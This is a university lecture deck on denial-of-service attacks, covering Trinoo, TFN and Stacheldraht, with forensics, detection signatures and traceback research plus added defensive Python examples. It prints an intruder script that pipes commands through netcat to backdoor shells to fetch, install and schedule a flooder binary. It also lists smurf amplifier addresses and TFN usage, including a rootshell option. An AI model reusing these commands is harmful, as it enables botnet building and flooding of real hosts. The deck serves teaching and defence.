denial of service cs155 spring quarter david brumley [email protected]
Posted on 21-Dec-2015
Denial of Service, CS155 Spring Quarter
David Brumley
Overview
• Overview/History of DoS
• Traditional DoS
• DDoS
• Tracking DoS
• Preventative Measures
• Conclusion
Who are we talking about?
Script Kiddies
Exploit Writers
Computer Professionals
R&D Labs/Universities
Gov't (NSA)
Example: GRC.COM
hi, its me, wicked, im the one nailing the server with
udp and icmp packets, nice sisco router, btw im 13, its
a new addition, nothin tracert cant handle, and ur on a
t3.....so up ur connection foo, we will just keep comin
at you, u cant stop us "script kiddies" because we are
better than you, plain and simple.
-------------------
Yo, u might not thing of this as anyomous, but its not real info, it’s a stolen earthlink, so its good, now, to speak of the implemented attacks, yeah its me, and the reason me and my 2 other contributers do this is because in a previous post you call us “script kiddies”, at least so I was told….
Classic DoS
• Fork/malloc() bomb
• Flooding
– June 1996 1st Adv. on UDP flooding
• Theme: Exploit finite queue or exposed unoptimized interface
• Fix 1: limit interface
• Fix 2: optimize interface
Example: SYN Flooding
• Fix 1: Minimal state cache @ A
• Fix 2: SYN Cookies
Overall Fixing is Non-Trivial Programming
[Diagram: three-way handshake between A and B: (1) SYN, SYN-ACK, (2) ACK]
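SYN cookies (Fix 2 above) let the server hold no state for half-open connections: the ISN it sends in the SYN-ACK encodes a time counter, an MSS index and a MAC over the connection 4-tuple, and the handshake-completing ACK is checked against that. The Python sketch below is an added example, not lecture material; the secret, the sample addresses and ports, and the 4-entry MSS table are constructed.

```python
import hmac, hashlib, socket, struct

SECRET = b"constructed-demo-secret"      # server key; real stacks pick one at boot
MSS_TABLE = (536, 1300, 1440, 1460)      # constructed; index fits the 3 MSS bits
CLIENT = socket.inet_aton("10.0.0.5")    # constructed sample 4-tuple
SERVER = socket.inet_aton("192.0.2.10")

def _mac24(secret, saddr, daddr, sport, dport, t5):
    """24-bit truncated HMAC over the 4-tuple and the 5-bit time counter."""
    msg = struct.pack("!4s4sHHB", saddr, daddr, sport, dport, t5)
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")

def make_syn_cookie(saddr, daddr, sport, dport, mss, t, secret=SECRET):
    """ISN for the SYN-ACK: [5 bits t][3 bits MSS index][24 bits MAC].
    Nothing about the half-open connection is stored on the server."""
    t5 = t & 0x1F
    idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    return (t5 << 27) | (idx << 24) | _mac24(secret, saddr, daddr, sport, dport, t5)

def check_syn_cookie(saddr, daddr, sport, dport, ack, now, secret=SECRET, max_age=1):
    """Validate the handshake-completing ACK (ack = our ISN + 1).
    Returns the negotiated MSS, or None if the cookie is stale or forged."""
    isn = (ack - 1) & 0xFFFFFFFF
    t5 = isn >> 27
    if (now - t5) & 0x1F > max_age:
        return None                    # counter too old: replayed or guessed
    if (isn & 0xFFFFFF) != _mac24(secret, saddr, daddr, sport, dport, t5):
        return None                    # MAC mismatch: wrong 4-tuple or forged ISN
    return MSS_TABLE[(isn >> 24) & 0x7]

if __name__ == "__main__":
    isn = make_syn_cookie(CLIENT, SERVER, 40000, 80, 1460, t=7)
    print(hex(isn), check_syn_cookie(CLIENT, SERVER, 40000, 80, isn + 1, now=7))
    print(check_syn_cookie(CLIENT, SERVER, 40000, 80, isn + 1, now=9))   # stale: None
```

A flood of SYNs therefore costs the server one HMAC per packet and no memory; only an ACK that carries a valid cookie allocates a connection.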
Most Prevalent Attacks
• Jolt/jolt2: IP Fragment Reassembly (UDP and TCP)
• Stream/raped: Flood with ACK's
• Trash: IGMP Flooding
• Mix UDP/TCP/ICMP flooding
• Starting to target routers instead of hosts
Distributed Attack: Smurf
…10’s to 100’s of hosts..
Amplification Networks
• Netscan.org:
– 210.95.3.128 427 (Korea)
– 203.252.30.0 401 (Korea)
– 203.252.30.255 390 (Korea)
– 210.95.3.255 300 (Korea)
– 130.87.223.255 174 (Japan)
– 206.101.110.127 (US)
• Average amplification: 4
Ping Attack
PING 206.101.110.127: 56 data bytes
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
….
64 bytes from 206.101.110.1: seq=13 ttl=21 time=127 ms.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=171 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=175 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=181 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=185 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=216 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=220 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=222 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=229 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=230 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=241 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=243 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=248 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=254 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=259 ms, duplicate.
….
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1513 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate.
….
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate.
….
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded
packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42) : Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
packet seq=13 bounced at 208.155.245.6: Time to live exceeded
64 bytes from 206.101.110.1: seq=13 ttl=21 time=6917 ms, duplicate.
packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time to live exceeded
Bad guy's point of view
• What to do if smurf no longer works?
– Admins could disable broadcast
– Admins could filter from broadcast networks
Distributed DoS
[Diagram: Client → Handlers/Masters → Agents/Daemons]
Building DDoS Networks
• Launch exploit
• Log in through back door
• Install daemon
• Install "rootkit" to hide daemon
• Repeat
Result of Exploit
Normal System:
sunset:security> telnet elaine
Trying 171.64.15.86...
Connected to elaine21.stanford.edu.
Escape character is '^]'.
UNIX(r) System V Release 4.0 (elaine21.Stanford.EDU)
elaine21.Stanford.EDU login:
Hacked System:
sunset:security> telnet jimi-hendrix 1524
Trying 171.65.38.180...
Connected to jimi-hendrix.Stanford.EDU (171.65.38.180).
Escape character is '^]'.
# ls -altr /;
total 1618
-r-xr-xr-x 1 root root 1541 Oct 14 1998 .cshrc
drwx------ 2 root root 8192 Apr 14 1999 lost+found
drwxr-xr-x 1 root root 9 Apr 14 1999 bin
drwxrwxr-x 2 root sys 512 Apr 14 1999 mnt
Example Intruder Script
• Automated exploit
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
• Trin.sh:
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
RCP
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8111]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8112]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8113]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8117]: [email protected] as demos: cmd='/usr/lib/sunw,rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8124]: [email protected] as demos: cmd='rcp -f neet.tar'
Jun 30 07:55:12 6E:rmt_sgi3 rshd[8127]: [email protected] as demos: cmd='rcp -f neet.tar'
….
Over 200 hosts compromised!
DDoS Networks
• Trinoo: June/July 1999
• TFN: August/September 1999
• Stacheldraht: Sept/October 1999
• IRC Botnet: More recent
Trinoo Overview
• Communication
– Attacker to Master(s): 27665/tcp
– Master to daemon(s): 27444/udp
– Daemon to Master(s): 31335/udp
• List of masters hard coded into clients
• UDP Flooder
Trinoo Master
• Daemon list blowfish encrypted
• Crypt() password required for startup
# ./master
?? wrongpassword
# . . .
# ./master
?? gOrave
trinoo v1.07d2+f3+c
Trinoo Master Commands
• die
• mtimer (set DoS timer)
• dos IP
• mdie (password required)
• mping - send "PING" command, should get a "PONG"
• mdos
• info - print version information
• msize - Set DoS packet size
• killdead - Solicits "*HELLO*" from clients, else removes entry
• bcast - list hosts
• mstop - attempt to stop DoS. Not implemented :)
Analysis of Handler
# strings - master
. . .
---v
v1.07d2+f3+c
trinoo %s
l44adsl <- Cleartext daemon password
sock
0nm1VNMX… <- crypt(g0rave)
local master
10:09:24
Sep 26 1999
trinoo %s [%s:%s]
bind
read
*HELLO*
ZsoTN.cq4X31 <- Blowfish crypt key
bored
NEW Bcast - %s
PONG
PONG %d Received from %s
Warning: Connection from %s
beUBZbLtK7kkY <- crypt(betalmostdone)
trinoo %s..[rpm8d/cb4Sx/]
. . .
DoS: usage: dos
DoS: Packeting %s.
aaa %s %s
mdie
ErDVt6azHrePE <- crypt(killme) for mdie
mdie: Disabling Bcasts.
d1e %s
mdie: password?
Daemon Forensics
• Starting the client sends "*HELLO*" to the master
• Commands of form "arg1 password arg2"
– aaa pass IP - DoS IP on random UDP ports
– bbb pass N - Sets time limits
– png pass - send a "PONG" to the master on port 31335/udp
– d1e pass - ...
• Note that UNIX strings by default only displays 4 or more ASCII characters!
# strings --bytes=3 ns | tail -15
socket
bind
recvfrom
l44
%s %s %s
aIf3YWfOhw.V.
aaa
bbb
shi
png
PONG
d1e
rsz
xyz
*HELLO*
Trinoo LSOF
# lsof | egrep ":31335|:27665"
master 1292 root 3u inet 2460 UDP *:31335
master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
master 1292 root cwd DIR 3,1 1024 14356 /tmp/...
master 1292 root rtd DIR 3,1 1024 2 /
master 1292 root txt REG 3,1 30492 14357 /tmp/.../master
master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
master 1292 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
master 1292 root 0u CHR 4,1 2967 /dev/tty1
master 1292 root 1u CHR 4,1 2967 /dev/tty1
master 1292 root 2u CHR 4,1 2967 /dev/tty1
master 1292 root 3u inet 2534 UDP *:31335
master 1292 root 4u inet 2535 TCP *:27665 (LISTEN)
Trinoo Forensics
• Master IP addresses visible
• Enough strings to recognize daemon/master easily
• Listening TCP/UDP ports can be seen with "lsof"
• Attacker session not encrypted
Tribal Flood Network
• Communication:
– Client to handler: none
– Handler <-> agent: ICMP Echo Reply
• DoS Types
– SYN
– UDP
– ICMP
– With spoofing capabilities
TFN Handler
--------------------------------------------------------------
[tribe flood network] (c) 1999 by Mixter
usage: ./tfn <iplist> <type> [ip] [port]
<iplist> contains a list of numerical hosts that are ready to flood
<type> -1 for spoofmask type (specify 0-3), -2 for packet size,
 is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp,
 4 to bind a rootshell (specify port)
 5 to smurf, first ip is target, further ips are broadcasts
[ip] target ip[s], separated by @ if more than one
[port] must be given for a syn flood, 0 = RANDOM
--------------------------------------------------------------------
TFN Commands
#define ID_ACK 123 /* for replies to the client */
#define ID_SHELL 456 /* to bind a rootshell, optional */
#define ID_PSIZE 789 /* to change size of udp/icmp packets */
#define ID_SWITCH 234 /* to switch spoofing mode */
#define ID_STOPIT 567 /* to stop flooding */
#define ID_SENDUDP 890 /* to udp flood */
#define ID_SENDSYN 345 /* to syn flood */
#define ID_SYNPORT 678 /* to set port */
#define ID_ICMP 901 /* to icmp flood */
#define ID_SMURF 666 /* haps! haps! */
Identifying an Agent
------------------------------------------------------------------------------
td 5931 root cwd DIR 3,5 1024 240721 /usr/lib/libx/...
td 5931 root rtd DIR 3,1 1024 2 /
td 5931 root txt REG 3,5 297508 240734 /usr/lib/libx/.../td
td 5931 root 3u sock 0,0 92814 can't identify protocol
------------------------------------------------------------------------------
Network Example
# ./tfn iplist 4 12345
[tribe flood network] (c) 1999 by Mixter
# tcpdump -lnx -s 1518 icmp
tcpdump: listening on eth0
05:51:32.706829 10.0.0.1 > 192.168.0.1: icmp: echo reply
 .... .... .... .... .... .... .... .... .... ....
 0000 64d1 01c8 0000 3132 3334 3500
 <- 0x01C8 = 456 base 10, "12345" in data portion
05:51:32.741556 192.168.0.1 > 10.0.0.1: icmp: echo reply
 .... .... .... .... .... .... .... .... .... ....
 0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420 746f 2070 6f72 7420 3132 3334 350a 00
 <- 0x007b = 123 base 10
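A defender can decode such a capture mechanically: the ICMP echo-reply ID field carries the TFN command number from the #define table above and the data carries its argument or the agent's reply. The Python decoder below is an added example, not lecture or TFN code; the two sample messages are the ICMP portions (after the 20-byte IP header shown as dots) of the tcpdump lines above, and the echo-reply builder only produces benign comparison traffic.

```python
import struct

# TFN handler<->agent command numbers (the #define values quoted on the slide)
TFN_IDS = {123: "ID_ACK", 456: "ID_SHELL", 789: "ID_PSIZE", 234: "ID_SWITCH",
           567: "ID_STOPIT", 890: "ID_SENDUDP", 345: "ID_SENDSYN",
           678: "ID_SYNPORT", 901: "ID_ICMP", 666: "ID_SMURF"}

# ICMP parts of the two captured packets above (IP header stripped)
HANDLER_TO_AGENT = bytes.fromhex("0000 64d1 01c8 0000 3132 3334 3500")
AGENT_TO_HANDLER = bytes.fromhex("0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420"
                                 "746f 2070 6f72 7420 3132 3334 350a 00")

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words; 0 means a valid message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def classify_icmp(icmp: bytes):
    """Return (verdict, icmp_id, payload) for one ICMP message (header + data).
    Echo replies whose ID is a TFN command value are flagged as 'tfn:<NAME>'."""
    if len(icmp) < 8:
        return ("short", None, b"")
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    if icmp_checksum(icmp) != 0:
        return ("bad-checksum", ident, icmp[8:])   # corrupted capture, do not match
    if typ == 0 and ident in TFN_IDS:
        return ("tfn:" + TFN_IDS[ident], ident, icmp[8:].rstrip(b"\x00"))
    return ("benign", ident, icmp[8:])

def build_echo_reply(ident: int, seq: int, data: bytes) -> bytes:
    """Construct a well-formed ICMP echo reply (used here for benign test traffic)."""
    hdr = struct.pack("!BBHHH", 0, 0, 0, ident, seq)
    return struct.pack("!BBHHH", 0, 0, icmp_checksum(hdr + data), ident, seq) + data

if __name__ == "__main__":
    for msg in (HANDLER_TO_AGENT, AGENT_TO_HANDLER, build_echo_reply(0x1234, 1, b"abc")):
        print(classify_icmp(msg))
```

Matching on the ID alone is a weak signal on its own (ordinary pings can use any ID), so in practice this would be combined with the lsof findings above and the fact that the flagged replies have no matching echo requests.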
Forensics
• Easy to spot in lsof (+)
• ICMP easy to disguise (-)
• ICMP ECHO_REPLY often allowed through firewall (-)
• Attacker's session not encrypted
Stacheldraht
• Communication:
– Client <-> Handler: 16660/tcp
– Handler <-> agent: 65000/tcp, ICMP_ECHOREPLY
– Doesn't use agent TCP for anything on versions I've seen
• Client/handler traffic blowfish encrypted
• UDP/TCP/ICMP flooding w/ spoofing
Stacheldraht Client and Handler
• Client to handler blowfish encrypted w/ password “authentication”
• Handler password “sicken” encrypted with crypt()
• More proactive at identifying live/dead hosts: Similar to distributed network
• Handler limited to 1000 agents
Handler Strings
starting trinoo emulation...
removing useful commands.
- DONE -
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop .killall
.showdead .showalive
usage: .distro <user> <server that runs rcp>
remember : the distro files need to be executable!
that means: chmod +x linux.bin , chmod +x sol.bin ;))
sending distro request to all bcasts....
user : %s
rcp server :
Stacheldraht Agent
• Interesting addition: Upgrade feature via rcp
• Attempts spoofed packet to handler to test if spoofing is possible
• Handlers compiled in or can be in blowfish encrypted file (def pass = “randomsucks”)
• On start sends to handler ID value 666 with data “skillz”, handler responds 667 with data “ficken”
DoS BotNets
• Scan for vulnerable hosts
• Infect
• Join IRC channel and wait for further commands
• Generally used for warez distribution as well
• Example: Kaiten
Fighting DDoS: Identify Agents
• Strings of master in daemon
• Finding master is important!
• Dump and log as much as possible
Identifying DDoS Agents
• Counter-espionage/intrusion
– Identify the intruder's signature
– Look for that signature
• RID
RID Examples
start AgentStacheldraht
send icmp type=0 id=668 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht
start AgentStacheldraht4
send icmp type=0 id=6268 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2
end AgentStacheldraht4
More RID Examples
start AgentTFN
send icmp type=0 id=789
recv icmp type=0 id=123 nmatch=2
end AgentTFN
start AgentTrinoo
send udp dport=27444 data="png l44adsl"
recv udp data="PONG" nmatch=1
end AgentTrinoo
RID @ Stanford
• start telnetd
send tcp dport=7000 data="\r\n"
recv tcp data="Ataman Telnetd" nmatch=1
end telnetd
• ./rid -t 20 -b 255 -n 2 171.64.0.0/16
**** 171.64.250.82 infected with telnetd
**** 171.64.245.132 infected with telnetd
**** 171.64.245.76 infected with telnetd
**** 171.64.245.22 infected with telnetd
**** 171.64.241.116 infected with telnetd
…
• 156 Total!
General DDoS Observations
• Intruders mix encryption mechanisms
• No architecture in security design
• Easily recognizable via strings
Defending against DoS
• Resisting DoS
– Filtering
– Traffic Shaping
– Pure filtering
• Ingress = incoming
• Egress = outgoing
• Locating attacker(s)
– Logging
– Automatic trace back
– Packet tagging
Logging
• Audit utilities:
– Tcpdump
– Argus
– Cisco Netflow
• Problem: huge data sets
• Asta.com: netflow monitor
Input Logging
1. Log on to nearest router
2. Enable input debugging on router
3. Find upstream
4. Recurse
Controlled Flooding
• Cheswick & Burch
• Idea: Follow the slowest routers
• Problems: obvious
[Diagram: Attacker → R1, R2, R3 → Victim]
Node Sampling - Savage et al., Method 1
• Use the IP fragment ID field
• Each router marks a packet with its own address with prob. p
• Issues:
– Needs p > 0.5
– Long time to infer path (-)
– Multiple attackers at same dist (-)
[Diagram: Attacker → R1 … R6 → Victim; a router's mark survives to the victim with probability p, p(1-p), p(1-p)^2, … as its distance from the victim grows]
Method 2: Edge Sampling
• Add 3 fields:
– 2 IP addresses making edge
– Distance vector
• Issues:
– Space requirements (-)
– p can be arbitrary (+)
– Complexity (-)
[Diagram: Attacker A → R1 … R6 → Victim; sampled edges in Src,Dst format: A,R3  R3,R2  R2,R6]
Savage’s Compression Method
• Step 1: router a decides to fill in the edge ID with its own address with prob. p and sets d=0
• Step 2a: next hop b notices d=0, writes b xor a; d++
• Step 2b: every later hop notices d != 0 and does d++
[Diagram: A → R3 → R2 → R1 → V]
V gets R1's addr
R2 xor R1 xor R1 = R2
R3 xor R2 xor R2 = R3
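Savage's compressed edge sampling and the victim-side XOR reconstruction from the slides above, as an added Python simulation that is not part of the lecture. The router addresses, packet counts, and the 50% agreement cutoff used to reject attacker-filled fields are constructed assumptions; the marking and decoding rules are the ones the slide states.

```python
import random
from collections import Counter

# constructed path: ROUTERS[0] is nearest the attacker, ROUTERS[-1] is the victim's last hop
ROUTERS = [0x0A000001, 0x0A000002, 0x0A000003, 0x0A000004]

def forward(path, p, rng, edge0=0, dist0=0):
    """Carry one packet through `path`; edge0/dist0 are the attacker-chosen
    initial field values. Returns the (edge, distance) mark the victim sees."""
    edge, dist = edge0, dist0
    for r in path:
        if rng.random() < p:          # Step 1: start a new edge with own address, d = 0
            edge, dist = r, 0
        else:
            if dist == 0:             # Step 2a: next hop completes the edge, b xor a
                edge ^= r
            dist += 1                 # Step 2b: every later hop only increments d
    return edge, dist

def reconstruct(marks, min_agree=0.5):
    """Victim side. Distance-0 samples are the last hop R0 itself; at distance d
    the edge is R_d xor R_{d-1}, so R_d = edge xor R_{d-1}. Stops at the first
    distance whose samples disagree: spoofed fields only reach the victim at
    distances >= the true path length and never form one consistent edge."""
    by_dist = {}
    for edge, dist in marks:
        by_dist.setdefault(dist, Counter())[edge] += 1
    path, prev, d = [], 0, 0
    while d in by_dist:
        (edge, n), = by_dist[d].most_common(1)
        if n < min_agree * sum(by_dist[d].values()):
            break
        prev = edge ^ prev            # d = 0: prev is 0, so this is R0 directly
        path.append(prev)
        d += 1
    return path[::-1]                 # attacker-nearest router first, like ROUTERS

def simulate(path, p, n_packets, seed=1):
    """Attacker pre-fills edge/distance with random values (worst case for the victim)."""
    rng = random.Random(seed)
    marks = [forward(path, p, rng, rng.getrandbits(32), rng.choice((0, 5)))
             for _ in range(n_packets)]
    return reconstruct(marks)

if __name__ == "__main__":
    print([hex(r) for r in simulate(ROUTERS, 0.04, 5000)])   # recovers ROUTERS
```

Because each sample pins down one edge rather than one node, p can be small (here 0.04) and the path is still recovered from a few thousand attack packets; node sampling needs p > 0.5 for the same job.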
Issues with Savage
• Spread edge identification across multiple packets (+)
• Combinatorial complexity during edge identification (-) (Fixed by Dean, Franklin, Stubblefield alg.)
• Reuse of IP fragment field (-)
• Does not work on existing hardware (IRL) (-)
Research Areas
• How vulnerable are P2P protocols?
• How can we better identify the person vs. the program?
• Automatic migration during an attack
Resources
• Packetstormsecurity.com - DDOS Tools
• Theorygroup.com - RID
• www.washington.edu/People/dad - David Dittrich's analysis
• www.cert.org/reports/dsit_workshop.pdf - CERT dealing with DDoS
Questions?
The End
Attacks Happen
General Direction
• Encrypted traffic
• Real software lifecycles
• Target name servers and other essential network equipment